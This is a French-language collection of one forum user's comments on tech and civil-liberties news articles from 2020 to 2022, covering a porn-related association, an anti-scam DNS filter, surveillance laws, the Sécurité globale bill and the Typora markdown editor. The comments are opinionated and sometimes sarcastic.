Ecoute, pour peu que ça vaille comme question, je suis un homme, j’espère juste ne pas avoir d’attaque ad hominem sur ce point.
En tout cas, les nanas mattent du porno aussi, promis.
Quel est pour toi la différence suivant le genre pour toi. J’aimerais avoir une réponse si possible objective, pour comprendre ton point de vue là dessus.
Edit 28/05/2022, 01:02 : fix typo
Le 24/05/2022 à 19h 13
Je suis persuadé (pas de chiffre, pas de source, juste mon ressenti) que ce n’est pas que le fait de protéger les enfants.
Pour moi, les personnes qui sont dans ce genre d’asso sont tout simplement répugnées par le porno. Tellement répugnées qu’elles en font un combat pieux (ha ha ha, pieux, asso chrétienne, tu l’as ? 😀). Une chasse aux sorcières (ha ha ha, chasse aux sorcières, référence à la chrétienté de l’époque, tu l’as ? 😀) avec pour tache divine de purger le bas monde des ignominies de la chair et qui prend “presque” comme excuse les enfants
En somme, le cliché classique de la mère de famille de 60 ans tirée à 4 épingles, qui a eu une éducation religieuse forte, qui a fait 4 enfants à son mari parce que et qui voit le sexe comme le diable personnifié parce qu’on lui a dit qu’un clito c’était tabou et qu’un pénis c’était obscène.
Filtre « anti-arnaques » d’Emmanuel Macron : optionnel pour les internautes, obligatoire pour les FAI
23/03/2022
Le 24/03/2022 à 12h 56
Je ne veux pas rentrer dans le débat de “est ce que ce filtre anti arnaque est bien ou pas ?”, “est ce que le gouv veut censurer ou pas ?” ni rien.
J’aimerais simplement émettre une remarque d’ordre général (pas spécifiquement lié au DNS de cet article donc). Bon nombre de personnes ici ont connaissance de solutions techniques, ce qui n’est pas le cas de la majorité.
Globalement, si une solution permet avec 20% d’effort d’effectuer 80% du boulot, ça “suffit” (loi de pareto, tout ça). Il y aura toujours des gens qui seront aptes à bypasser telle ou telle solution, mais ces personnes ne sont pas la cible du sujet (encore une fois peu importe le sujet), l’idée étant de faire passer la solution pour 80% des utilisateurs avec 20% d’énergie.
Si je prend un autre exemple avec le téléchargement illégal : bloquer les sites miroirs permet avec une action rapide (20% d’énergie) de rendre les sites miroirs indisponibles pour la majorité (80% de “bénéfice”) des utilisateurs.
/!\ Je me répète, je ne dis pas que c’est bien ou pas (autant pour ce filtre que pour les sites miroirs). Je dis juste que pour moi, l’idée n’est pas de cibler toute la population car c’est impossible, mais la majorité avec un moyen “simple”.
Voilà, des bisous
Edit : fix pour lisibilité
[Document] Renseignement : la « lettre rectificative » préparée par le gouvernement
08/05/2021
Le 08/05/2021 à 08h 26
Rien de mieux qu’un article comme ça pour commencer la journée x)
Darmanin a quand même cet incroyable pouvoir de me faire bouillir le sang en moins de 30 secondes, chaque décision de sa part menant un peu plus vers son sacro-saint 1984.
Mais trêves de plaisanteries, j’ai quand même une paire de questions.
est ce qu’on a une idée de comment il veut les récupérer, ces urls ? parce que les 3 derniers sites au monde qui restent en HTTP plain text, on s’en fout un peu. Du coup, hormis demander les logs aux sites (lol), je ne vois pas grand chose d’autre à part casser le SSL. Et ça, il en serait possible, le bougre…
cette rustine, il arrive en mode “hey mes petits potes à la compote, je vous ai pondu ça hier devant ‘Plus belle la vie sécuritaire’, donc vous me ferez le plaisir de le rajouter dans votre bouquin rouge là, le dalloz-j’sais-pas-quoi”, ou alors ça suit un circuit classique de validation ?*
il existe quelque part des stats/données/résultats de ce qui est collecté ? Et de l’utilité réelle que ça apporte ?
quelqu’un pourrait refaire du café svp ?
Have fun
ElCroco
* Le lecteur avisé se rendra compte que je n’y connais rien dans ce domaine ^^’
Edit : fix typos
Edit 2 : Merci Marc pour cet article qui, même si je vais encore m’énerver contre ma cafetière, est comme toujours clair et instructif
Ce que prévoit la proposition de loi Sécurité globale, version Sénat
23/03/2021
Le 24/03/2021 à 11h 49
Globalement, c’est un soufflé qui est retombé. Les médias en ont parlé 2⁄3 jours en mode “ouin ouin l’article va nous brider la liberté de la presse”*
Du coup, des gens sont allés dans la rue, un peu. Il y a eu quelques manifestations sur paris (et d’autres grandes villes).
Il y a même eu des circonstances qui sont arrivées plus ou moins au même moment, et qui auraient pu mettre un sacré bazar : https://www.francetvinfo.fr/politique/proposition-de-loi-sur-la-securite-globale/video-manifestation-a-paris-un-policier-pousse-au-sol-et-lynche-par-des-casseurs_4200085.html
https://www.lexpress.fr/actualite/societe/producteur-de-musique-tabasse-par-la-police-a-paris-ce-que-l-on-sait_2139503.html
Mais c’est comme tout, les gens oublient vite si on ne leur rappelle pas, donc ils ont oublié ce combat . Et comme les médias sont passés à autre chose très vite, poof, plus rien.
Je viens de faire des stats ultra précises et fiables : globalement NXI et numérama en ont parlé pas mal en novembre 2020, depuis quelques jours parce que ça passe au sénat, et quasi rien entre les 2. Alors les médias mainstream…
Maintenant, certaines personnes gueulent, mais chez soi.
Donc en tldr, ça passe crème*
Tchoubzisouslol
* Ce que je ne remet pas en cause. Par contre, je remet en cause le fait qu’ils n’aient parlé QUE de cet article, alors que ce n’est clairement pas le seul dangereux
Bon j’exagère, comme dit par d’autres, le covid/couvre feu/confinement/les fêtes de noël/whatever sont passés par là et a permis de restreindre les manifs.
* On notera que je suis pessimiste/réaliste (au choix), et que je considère que, de base, à partir du moment où le gouv pousse une loi, à moins que ça touche au fric des
péonsfrançais, on est foupoudav.Edit : fix mise en page et typos
La CNIL refroidit l’appétit de Big Brother Bercy
15/02/2021
Le 15/02/2021 à 16h 52
Question bête. Quid des plateformes de discussions ? Je pense principalement à discord, IRC, mais on peut également imaginer les groupes telegram publics ou d’autres.
De plus, de ce que j’en compris, la CNIL a dit “hey ho, on va s’calmer Jean Michel Bercy, mais on a dit public, pas ‘avec un compte’”, mais pour l’instant, le fameux Jean Michel Bercy n’a rien répondu et n’est pas dans l’obligation d’accepter la demande de la CNIL ?
Le futur délit de « mise en danger de la vie d’autrui » par diffusion de données personnelles
18/11/2020
Le 18/11/2020 à 13h 25
“le gouvernement étudiera toutes les propositions d’où qu’elles viennent dans cet hémicycle.”
Je sais pas si le fait qu’il le précise est une bonne chose ou non tiens…
Typora : un très bon éditeur de texte, multiplateforme, mais encore en bêta
12/11/2020
Le 14/11/2020 à 20h 38
Bah voilà, on y est -_-
On sort clairement du sujet de base, mais ça me saoule un peu toutes ces “nouveautés” qui font qu’internet devienne une usine à gaz
Le 12/11/2020 à 18h 03
Pour la sauvegarde, à la limite, suffit de mettre ça dans le local storage du browser, et quand je veux récupérer un fichier j’exporte simplement le local storage :)
Et je ne doute pas une seule seconde que Google sorte un de ces jours une API JS pour pouvoir écrire directement sur le disque… (A mon plus grand malheur mais ceci est une autre histoire)
Bon cela dit je crois qu’on s’éloigne un peu du sujet de base
Le 12/11/2020 à 16h 01
Tu marques un point sur la partie recoder un moteur HTML/CSS/JS :)
Cela dit, quitte à devoir charger tout un moteur de rendu, autant que j’utilise mon browser avec une webapp locale, ça me coûtera aussi cher en ram, mais je n’aurais pas besoin d’installer un N-ème soft ^^
Le 12/11/2020 à 14h 45
J’utilise Jekyll + github pages. Coté Jekyll une fois que la configuration initiale est faite (c’est un peu chiant, mais ça se fait quand même) et que le CSS est en place, t’as plus à y toucher.
Quand tu veux écrire un article, tu mets ton .md dans l’arbo jekyll, puis jekyll ; et les commandes git classiques pour pousser sur GH Pages.
Le 12/11/2020 à 14h 14
Merci pour cet article.
J’utilise -quand je prend le temps, c’est à dire une fois dans l’année- jekyll pour écrire des blogposts. Jusqu’à présent j’ai toujours utilisé Sublime Text, en écrivant le md en brut, puis en compilant le blogpost avec les commandes jekyll pour voir le résultat via le browser. Pas pratique pratique…
Comme je ne m’attelle pas à l’exercice tous les matins, cette solution était “viable”, mais un véritable éditeur markdown est une bonne idée.
Du coup, quelques questions me viennent à l’esprit :
Pour info, je n’ai pas -encore- lu les 2 autres articles, sur simplenote et zettlr, je n’ai pas tous les éléments du comparatif du coup ^^’
Ce que prévoit la proposition de loi sur la Sécurité globale après la commission des lois
06/11/2020
Le 07/11/2020 à 09h 51
Bien bien bien…
J’en viens à être content de la pandémie de covid, on a au moins le droit de se masquer -temporairement- le visage…
(Ceci était moitié une blague moitié un c’est-triste-mais-c’est-quand-même-la-réalité)
Plus sérieusement, merci @marc rees pour rendre le tout compréhensible par le commun des mortels.
Ca veut dire quoi ? Maintenant que le texte est passé en commission, il passe en séance, et après hop, emballé c’est pesé, ajoutez moi ça au dalloz ?
J’avais déjà posé la question dans le précédent article, mais du pas eu de réponse : quel recours a-t-on ?
J’ai étonnamment l’impression que tout le monde s’en fout de cette loi : je n’ai pas réellement vu d’articles de presse, de journaux, etc en parler.
Censure de photos, drones, reconnaissance faciale… déluge sécuritaire à l’Assemblée
02/11/2020
Le 05/11/2020 à 11h 58
La PPL devait être examinée hier, a-t-on des nouvelles ?
J’ai vu passer un thread de @marc ress sur twitter, mais c’est un peu décousu :/
Le 03/11/2020 à 18h 49
C’est la Liberté qui pleure.
Le 03/11/2020 à 09h 50
Le fait de me (ré)abonner à NXI, chose que je voulais +/- faire depuis longtemps a été totalement influencé par cet article (et son thread twitter associé), gg @Marc Rees
Bon, ça, c’est dit :) Maintenant, mes questions !
Je ne comprend pas pourquoi tout ça ne fait pas plus de bruit : hormis un post de LQDN et un article sur mediapart (en plus de celui ci, of course), je n’ai pas réellement vu d’analyse ou d’article de presse qui levait le point (poing ?
) et des dangers clairs que cela pouvait apporter. Hormis le fameux “omg il y a le covid, arrêtons de parler du reste et ne parlons que de ça”, je ne vois pas pourquoi personne n’en parle…
Si quelqu’un a une idée…
De ce que j’en ai compris (c’est à dire pas tant que ça… ^^‘), cette PPL doit être examinée demain (C’est à partir de mercredi que les députés réunis en Commission des lois ausculteront les 340 amendements officiellement déposés.). Je comprend bien les raisons sous-jacentes/officieuses de la faire passer aussi vite. Mais le gouvernement a t-il au moins essayé de trouver un semblant de justification valable ? Ou alors il est carrément en mode “ah mais on s’en fiche de ce que vous pensez, on la fait passer en scred pendant le confinement pour que personne n’en parle, et même pas nous” ?
Enfin, qu’est ce qu’on peut faire ? Je n’aime pas trop trop l’idée de cette PPL qui rogne encore plus nos libertés, et je suis partant pour faire quelque chose, mais quoi ? Les manifs, ça ne marche pas, les pétitions, ça ne marche pas, du coup, qu’est ce qui marche ? Quels recours peut-on avoir ?
Edit : il y a moyen de tagguer les gens via un @ ?